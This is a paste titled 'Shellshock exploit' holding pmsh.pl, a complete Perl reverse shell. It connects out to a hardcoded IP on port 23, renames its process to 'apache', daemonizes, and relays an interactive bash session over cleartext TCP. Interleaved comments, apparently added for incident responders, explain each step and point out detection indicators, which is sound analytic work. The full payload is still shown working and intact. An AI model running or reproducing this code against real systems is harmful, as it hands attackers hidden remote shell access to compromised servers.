
Shellshock exploit

a guest
Sep 25th, 2014
  1. #!/usr/bin/perl -w
  2.  
  3. use IO::Socket;
  4. use Fcntl;
  5.  
  6. # IOCTLs
  # Hard-coded ioctl request numbers, used further down on /dev/ptmx.
  # -2147199952 is 0x80045430 read as a signed 32-bit value and 1074025521 is
  # 0x40045431; these match TIOCGPTN / TIOCSPTLCK in Linux's generic ioctl
  # encoding, so the script is tied to Linux systems that use those values.
  7. $TIOCGPTN = -2147199952;
  8. $TIOCSPTLCK = 1074025521;
  # errno value compared against $! in the relay code below; 11 is EAGAIN on Linux.
  9. $EAGAIN=11;
  10.  
  # The banner identifies the program as pmsh.pl v0.1 (2006). Nothing in this
  # listing touches Bash environment handling, so despite the paste title this
  # is not a Shellshock trigger; presumably it was used as a payload after
  # exploitation (cannot be confirmed from the page). The banner text itself
  # is a usable string indicator when hunting for copies on disk.
  11. print "pmsh.pl v0.1 (c) 2006 Michael Schierl <schierlm-public AT gmx DOT de>\n";
  12.  
  # Remote endpoint is fixed in the script. The host running this code opens
  # an OUTBOUND TCP connection to port 23 instead of listening, so inbound
  # firewall rules do not block it; egress logs showing a server talking to
  # this address/port are the network-side indicator.
  13. $HOST="72.167.37.182";
  14. $PORT="23";
  15.  
  # Overwrites the process title so process listings show "apache" instead of
  # the perl invocation. Comparing the displayed name with the real
  # executable (e.g. /proc/<pid>/exe) exposes the mismatch.
  16. $0="apache";
  17.  
  18. print "Connecting to $HOST:$PORT... ";
  19.  
  # Non-blocking TCP client socket to $HOST:$PORT; the script dies with $! if
  # the constructor returns false.
  20. $sock = new IO::Socket::INET (
  21.     PeerAddr => $HOST,
  22.     PeerPort => $PORT,
  23.     Proto => 'tcp',
  24.     Blocking => 0,
  25. ) or die $!;
  26.  
  # Allocates a pseudo terminal by hand with raw ioctls on /dev/ptmx; this
  # block calls no external helper and uses only the IO::Socket / Fcntl
  # imports at the top of the listing.
  27. print "ok\nAllocatig pseudo terminal... ";
  28.  
  # Manual ptsname(): open the pty multiplexer read/write and non-blocking,
  # then ask the kernel for the index of the new slave. ioctl() fills $tmp
  # with a packed native int, which unpack('i') turns into the number N of
  # /dev/pts/N.
  29. ## ptsname
  30. sysopen (PTMX, '/dev/ptmx', O_RDWR|O_NONBLOCK) or die $!;
  31. $tmp='';
  32. ioctl (PTMX, $TIOCGPTN, $tmp) or die $!;
  33. $pts = unpack('i', $tmp);
  34.  
  35. print "/dev/pts/$pts\nInitializing pseudo terminal... ";
  36.  
  37. ## grantpt not needed on devpts
  38.  
  # Manual unlockpt(): TIOCSPTLCK with a packed 0 clears the lock on the
  # slave side so /dev/pts/$pts can be opened by the shell started below.
  39. ## unlockpt
  40. $unlock=pack('i', 0);
  41. ioctl(PTMX, $TIOCSPTLCK, $unlock) or die $!;
  42.  
  # Detaches from the launching process: working directory moved to /,
  # STDIN re-opened on /dev/null, umask cleared.
  43. ## prepare daemonizing
  44. chdir '/' or die $!;
  45. open STDIN, '/dev/null' or die $!;
  46. umask 0;
  47.  
  48. print "ok\nForking shell thread...";
  49.  
  # First fork: the original process exits, so whatever launched the script
  # sees it finish while the child keeps running in the background.
  50. defined($pid = fork) or die $!;
  51. exit if $pid;
  # Second fork: the child ($pid == 0) becomes the shell, the parent goes on
  # to act as the relay between the pty master and the socket.
  52. defined($pid = fork) or die $!;
  53. if (!$pid) {
  # exec() only returns on failure, so the second exec is a fallback. First
  # choice is getty with /bin/bash passed via -l on the pty slave (on agetty,
  # -n skips the login prompt and -l names the program run instead of login);
  # the fallback string contains redirections, so Perl runs it through the
  # shell with bash's stdio pointed at the slave.
  # Host-side artefact for responders: a bash/getty process attached to
  # /dev/pts/$pts with no matching interactive login session.
  54.     exec("/sbin/getty -n -l /bin/bash 38400 /dev/pts/$pts") or
  55.     exec("/bin/bash </dev/pts/$pts >/dev/pts/$pts 2>/dev/pts/$pts") or
  56.     die $!;
  57.     exit;
  58. }        
  59.  
  60. print "ok\nHave fun!\n";
  61.  
  # From here on the relay process is silent: any later die() message goes to
  # /dev/null, so failures leave no output behind.
  62. open STDOUT, '>>/dev/null' or die $!;
  63. open STDERR, '>>/dev/null' or die $!;
  64.  
  # Prepares the select() bit vectors and per-handle buffering for the relay.
  # $pp holds the bareword PTMX (the script runs without `use strict`) and is
  # used as the pty-master handle from here on.
  65. $pp = PTMX;
  # Only the read set is populated (pty master + socket); the write and
  # exception sets stay empty.
  66. $rin=$win=$ein='';
  67. vec($rin,fileno($pp),1) =1;
  68. vec($rin,fileno($sock),1) = 1;
  69.  
  # select(HANDLE) followed by $|=1 turns on autoflush for that handle; done
  # for the socket, the pty master and STDOUT in turn, leaving STDOUT selected.
  70. select $sock;
  71. $|=1;
  72. select PTMX;
  73. $|=1;
  74. select STDOUT;
  75. $|=1;
  # Global flag set by forwarddata() when either side reports end-of-file.
  76. $finished=0;
  77.  
  # forwarddata($from, $to): drain everything currently readable from $from
  # and copy it unchanged to $to. Uses the globals $rv, $buff and $finished.
  # Returns when the non-blocking read reports EAGAIN (nothing more to read)
  # or when a read of 0 bytes (EOF) sets $finished; any other read or write
  # error is fatal.
  # The bytes are copied verbatim: the code shown adds no authentication and
  # no encryption, so the shell I/O crosses the network in cleartext and is
  # visible to network monitoring on the path.
  78. sub forwarddata {
  79.     my ($from,$to) = @_;
  80.     while(1) {
  # Read at most 1024 bytes per pass.
  81.         $rv = sysread($from, $buff, 1024);
  82.         last if (!defined($rv) && $! == $EAGAIN);  
  83.         defined($rv) or die $!;
  84.         if ($rv == 0) { $finished = 1; last;}
  # Write loop handles short writes: the part already written is cut off the
  # front of $buff and the rest is retried. EAGAIN on the non-blocking
  # destination is retried immediately (busy-wait) until the write succeeds.
  85.         while(length $buff > 0) {
  86.             $rv = syswrite($to, $buff, length $buff);
  87.             if (!defined($rv) && $! == $EAGAIN) {
  88.                 ## try again
  89.                 next;
  90.             }
  91.             defined($rv) or die $!;
  92.             last if ($rv == length $buff);
  93.             substr($buff,0,$rv) = '';
  94.         }
  95.     }
  96. }
  97.  
  # Main relay loop: block in select() (no timeout) until the pty master or
  # the socket is readable, then pump both directions. $rout/$wout/$eout are
  # assigned but not read in the code shown, so both handles are polled on
  # every wake-up and the non-blocking reads return EAGAIN on the idle one.
  # The loop ends as soon as either side reaches EOF (shell exited or the
  # remote peer closed the connection).
  98. while(! $finished) {
  99.     $nfound = select($rout=$rin, $wout=$win, $eout=$ein, undef);
  100.     die $! if ($nfound == -1);
  # pty -> network (shell output), then network -> pty (remote input).
  101.     forwarddata($pp,$sock);
  102.     last if $finished;
  103.     forwarddata($sock,$pp);
  104.     last if $finished;
  105. }
  # Release the pty master and the socket once the session is over.
  106. close PTMX;
  107. close $sock;